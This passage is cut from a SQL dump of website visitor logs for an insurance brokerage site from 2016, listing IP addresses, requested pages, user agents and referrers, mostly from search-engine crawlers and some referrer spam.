9','','','','','','','','0','0',0),(26390,'0b_376d367ab95da01baac3c7cefa96d980','1462704618','5.153.233.130','5.153.233.130','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(26393,'0b_6eb8882c7a6308f730850a429b1e4256','1462705700','217.69.133.220','fetcher2-1.p.mail.ru','/SSO/235_42.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','RU_Bot','','','','0','0',0),(26394,'0b_caf58b9b8d185c90a3be668fd8a40d33','1462706016','66.249.66.18','crawl-66-249-66-18.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26396,'0b_0a62285053fdd0365dca296dca728da9','1462706681','180.76.15.8','baiduspider-180-76-15-8.crawl.baidu.com','/about-us/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(26399,'0b_b67613fbb1809fd645ff445a0376d53e','1462706948','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.1.4322)','http://allsilver925.co.il/','',0,'Win2000','IE 5','ua','','','','','','','0','0',0),(26400,'0b_b67613fbb1809fd645ff445a0376d53e','1462706948','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; .NET CLR 1.1.4322)','http://porno-video-chati.ru/','',0,'Win2000','IE 5','ua','','','','','','','0','0',0),(26402,'0b_532f35967d55a6f4e96b9ee776105d90','1462709594','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(26403,'0b_48a5081aa184c540a98033883d186aeb','1462709975','66.249.66.18','crawl-66-249-66-18.googlebot.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.empireins.com/','',0,'','','us','','','Googlebot','','','','0','0',0),(26405,'0b_4133c7cb76a2d7636df57f582774c7be','1462712570','204.79.180.182','204.79.180.182','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)','','',0,'Win7','IE 9','us','','','','','','','0','0',0),(26408,'0b_4133c7cb76a2d7636df57f582774c7be','1462712584','204.79.180.196','204.79.180.196','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)','http://www.empireins.com/','',0,'Win7','IE 9','us','','','','','','','0','0',0),(26411,'0b_00fa608fb8317d3b7bb35aaf578e9ef4','1462715395','40.77.167.41','msnbot-40-77-167-41.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(26414,'0b_aef34d8d674ae9079ff7b004e811905b','1462715652','192.3.92.69','192-3-92-69-host.colocrossing.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26415,'0b_aef34d8d674ae9079ff7b004e811905b','1462715653','192.3.92.69','192-3-92-69-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26418,'0b_dfc3d355dff64e75f49f87ff8a92f7a0','1462715880','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(26421,'0b_68161f73a10d8d73df557c0174a2e235','1462717342','66.249.66.37','crawl-66-249-66-37.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26423,'0b_68161f73a10d8d73df557c0174a2e235','1462717344','66.249.66.34','crawl-66-249-66-34.googlebot.com','/.well-known/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26424,'0b_68161f73a10d8d73df557c0174a2e235','1462717344','66.249.66.37','crawl-66-249-66-37.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26427,'0b_3ed5f2dcd8af3841ee14e044d298d38f','1462717754','88.198.22.8','static.88-198-22-8.clients.your-server.de','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; BRI/2; McAfee)','','',0,'WinVista','IE 9','de','','','','','','','0','0',0),(26429,'0b_44be456680e7b6fd32284878dbdb0aea','1462718188','144.76.80.151','static.151.80.76.144.clients.your-server.de','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; HPDTDFJS; InfoPath.2)','','',0,'Win8 x64','IE 10','de','','','','','','','0','0',0),(26430,'0b_f6ac18eb5ac4e6c430aa35e8e05db58e','1462720060','184.154.36.163','scan21.sitelock.com','/','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(26432,'0b_f6ac18eb5ac4e6c430aa35e8e05db58e','1462720060','184.154.36.163','scan21.sitelock.com','/','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(26433,'0b_f6ac18eb5ac4e6c430aa35e8e05db58e','1462720061','184.154.36.163','scan21.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(26435,'0b_2208a5694be2fe1d1279cff81d853e48','1462720063','184.154.36.163','scan21.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(26438,'0b_d8e21df38c5a2c9644b5f26366a48eed','1462720779','66.249.66.24','crawl-66-249-66-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(26441,'0b_37bafc6b587649ee46e3db898adbd982','1462721079','88.198.22.8','static.88-198-22-8.clients.your-server.de','/feed/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; McAfee; InfoPath.3; MAARJS)','','',0,'Win8 x64','IE 10','de','','','','','','','0','0',0),(26442,'0b_37bafc6b587649ee46e3db898adbd982','1462721080','88.198.22.8','static.88-198-22-8.clients.your-server.de','/comments/feed/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; McAfee; InfoPath.3; MAARJS)','','',0,'Win8 x64','IE 10','de','','','','','','','0','0',0),(26445,'0b_37bafc6b587649ee46e3db898adbd982','1462721081','88.198.22.8','static.88-198-22-8.clients.your-server.de','/home/feed/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; McAfee; InfoPath.3; MAARJS)','','',0,'Win8 x64','IE 10','de','','','','','','','0','0',0),(26448,'0b_37bafc6b587649ee46e3db898adbd982','1462721081','88.198.22.8','static.88-198-22-8.clients.your-server.de','/agent-tools/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; McAfee; InfoPath.3; MAARJS)','','',0,'Win8 x64','IE 10','de','','','','','','','0','0',0),(26451,'0b_09f2831e5e7ce9789d5746f421aa60bb','1462721254','144.76.80.151','static.151.80.76.144.clients.your-server.de','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; CognosRCP)','','',0,'WinVista','IE 9','de','','','','','','','0','0',0),(26454,'0b_09f2831e5e7ce9789d5746f421aa60bb','1462721255','144.76.80.151','static.151.80.76.144.clients.your-server.de','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; CognosRCP)','','',0,'WinVista','IE 9','de','','','','','','','0','0',0),(26457,'0b_09f2831e5e7ce9789d5746f421aa60bb','1462721256','144.76.80.151','static.151.80.76.144.clients.your-server.de','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; CognosRCP)','','',0,'WinVista','IE 9','de','','','','','','','0','0',0),(26460,'0b_09f2831e5e7ce9789d5746f421aa60bb','1462721256','144.76.80.151','static.151.80.76.144.clients.your-server.de','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; CognosRCP)','','',0,'WinVista','IE 9','de','','','','','','','0','0',0),(26462,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723503','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26463,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723504','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26466,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723505','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/register/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26468,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723506','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26471,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723507','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/insentives/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26472,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723508','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/licensing-contracting/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26474,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723510','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/agent-tools/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26477,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723511','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/carriers/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26478,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723511','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/contact/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26480,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723513','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/case-status/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26481,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723514','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/forms/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26483,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723517','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/igo/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26484,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723518','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/term-quotes/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26486,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723519','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26487,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723520','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26489,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723521','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26492,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723522','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26495,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723524','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/feed/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26496,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723524','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/comments/feed/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26499,'0b_3fd7e911847dfd48451a5fb2fd706789','1462723525','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/home/feed/','Mozilla/5.0 (compatible; Goodzer/2.0; crawler@goodzer.com)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(26502,'0b_af9245ded1cc182e2bb27f7153b7ade8','1462726322','192.227.211.52','192-227-211-52-host.colocrossing.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26505,'0b_af9245ded1cc182e2bb27f7153b7ade8','1462726324','192.227.211.52','192-227-211-52-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26507,'0b_72d3fd0956fb2a45fd076eee50975ae4','1462726840','207.241.231.165','crawl339.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(26508,'0b_72d3fd0956fb2a45fd076eee50975ae4','1462726844','207.241.231.165','crawl339.us.archive.org','/main.html','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','http://empireins.com/','',0,'','','','','','org_bot','','','','0','0',0),(26510,'0b_72d3fd0956fb2a45fd076eee50975ae4','1462726846','207.241.231.165','crawl339.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(26513,'0b_72d3fd0956fb2a45fd076eee50975ae4','1462726849','207.241.231.165','crawl339.us.archive.org','/main.html','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','http://empireins.com/main.html','',0,'','','','','','org_bot','','','','0','0',0),(26516,'0b_9f30bbc3f840a6925f7765381401dbc6','1462728133','217.69.133.220','fetcher2-1.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(26517,'0b_9f30bbc3f840a6925f7765381401dbc6','1462728135','217.69.133.226','fetcher2-7.p.mail.ru','/illustration.htm','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26520,'0b_9f30bbc3f840a6925f7765381401dbc6','1462728139','217.69.133.226','fetcher2-7.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26522,'0b_2e3df18c9d3239f7fe956b6312f1c4ab','1462728141','217.69.133.68','fetcher2.p.mail.ru','/illustration.htm','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','http://empireins.com/illustration.htm','',0,'Linux','','ru','','','RU_Bot','','','','0','0',0),(26523,'0b_9f30bbc3f840a6925f7765381401dbc6','1462728159','217.69.133.222','fetcher2-3.p.mail.ru','/SSO/235_18.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26526,'0b_4c6abee4915c0f8ac4edf93c23b334df','1462729038','144.76.30.236','thoreau.tk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','tk','','','MJ12bot','','','','0','0',0),(26528,'0b_4c6abee4915c0f8ac4edf93c23b334df','1462729042','144.76.30.236','thoreau.tk','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','tk','','','MJ12bot','','','','0','0',0),(26529,'0b_f96f36c96c68406d527a26fcb1c7af64','1462729167','54.166.137.30','ec2-54-166-137-30.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1','','',0,'MacOSX','Chrome 21','','','','','','','','0','0',0),(26532,'0b_22b6dde301f3e42c9fc893bdef893270','1462729172','172.58.201.179','172.58.201.179','/','Mozilla/5.0 (Linux; Android 5.1.1; LGMS330 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Mobile Safari/537.36','','',0,'Android 5','Chrome 49 Mobile','us','','','','','','','0','0',0),(26535,'0b_22b6dde301f3e42c9fc893bdef893270','1462729178','172.58.201.179','172.58.201.179','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; LGMS330 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 49 Mobile','us','','','','','','','0','0',0),(26538,'0b_22b6dde301f3e42c9fc893bdef893270','1462729470','172.58.201.179','172.58.201.179','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; LGMS330 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 49 Mobile','us','320 x 570','','','','','','0','0',0),(26540,'0b_a6e534d73ed8a88790af9051d9cb7272','1462729839','45.33.59.157','li1009-157.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(26543,'0b_0fd72a24f7fe03a752760b731315106a','1462730140','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)','http://kinderok.com/','',0,'Win3.x','IE 5','','','','','','','','0','0',0),(26544,'0b_e7d65425e3d2a08428f537cc3ae4e42a','1462730141','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','http://ifirestarter.ru/','',0,'Win2000','IE 6','','','','','','','','0','0',0),(26546,'0b_26296fa157be94c0a41c2a81bf25c3f2','1462731379','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(26547,'0b_68662e090b1d75f0eebad6b91f13f7cb','1462733842','217.69.133.220','fetcher2-1.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(26549,'0b_68662e090b1d75f0eebad6b91f13f7cb','1462733845','217.69.133.223','fetcher2-4.p.mail.ru','/SSO/235_11.html','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','','','','','0','0',0),(26552,'0b_63216ad206a682cc0450cdb57f9d1a27','1462733851','217.69.133.68','fetcher2.p.mail.ru','/robots.txt','Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)','','',0,'Linux','','ru','','','Unknown Spider','','','','0','0',0),(26553,'0b_bb71ae1753528dfa36d6a4ee21ca9773','1462734207','107.173.248.28','107-173-248-28-host.colocrossing.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26555,'0b_bb71ae1753528dfa36d6a4ee21ca9773','1462734209','107.173.248.28','107-173-248-28-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(26558,'0b_c26b3ddd206ee6ee27588eb0beec1c37','1462734395','185.18.20.14','185.18.20.14','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MATMJS)','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1048.rwoz1aXue8A-1B_TEboajSkX30HINjl4XRGfT6N3-XzUY1jsQwMZzXPkOhvcw2_t.166cad32f49e764e018f1a180f50ade9842b693f&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxdjkzZXowZkNrenRvSEpGOGJJWlVnc3UtNmlUcWZnWDFFZHF5dEJHampwb2N1QjZlUUZVemVTQ3VRVTJiakZOaUJneklqaG1LRjNS&b64e=2&sign=5dcfd0332e2746fe748a571eefef50bc&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYuwSQLovbTTvBhFoWx3SJrIHbxh3ZdJCc8g3ccneVllpY_xTfu7YaIp7uO1SE04QPQzw65j2wKZsgOxNgb3mV_I0b6nW2M9fgmYIiuoyt9a7Q_4ADy2CXN0OFmVfrFNfRQlhtFVLvYB&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCV-bB70LKhDfJWr_rulvISEfXexIeKmSHYNZJZaFtnaaqhQG9XwgPUEIrJl9B7vnaYkvieFhjY3Hg&l10n=ru&cts=1462724432266&mc=2.75414973179','',0,'Win8 x64','IE 10','us','','','','','','','0','0',0),(26561,'0b_c26b3ddd206ee6ee27588eb0beec1c37','1462734421','185.18.20.14','185.18.20.14','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MATMJS)','http://www.empireins.com/','',0,'Win8 x64','IE 10','us','','','','','','','0','0',0),(26564,'0b_850a3d7855fd856b3ee04272699e0d79','1462735253','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(26565,'0b_850a3d7855fd856b3ee04272699e0d79','1462735255','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(26568,'0b_23da82b5b0676b198347a56ccbf1a344','1462736233','40.77.167.41','msnbot-40-77-167-41.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(26571,'0b_804b63eeed140e48754f9b6039c518b5','1462736749','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(26574,'0b_804b63eeed140e48754f9b6039c518b5','1462736751','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(26577,'0b_657e0ae67aa944b7fd442d07c1bd5842','1462737816','40.77.167.41','msnbot-40-77-167-41.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(26580,'0b_55e1ba9a5c26ae3d90c278f326e4b782','1462737821','199.30.24.246','msnbot-199-30-24-246.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(26583,'0b_9bb44ae90b1d926420793dee5f639dd8','1462738063','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(26585,'0b_9bb44ae90b1d926420793dee5f639dd8','1462738064','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 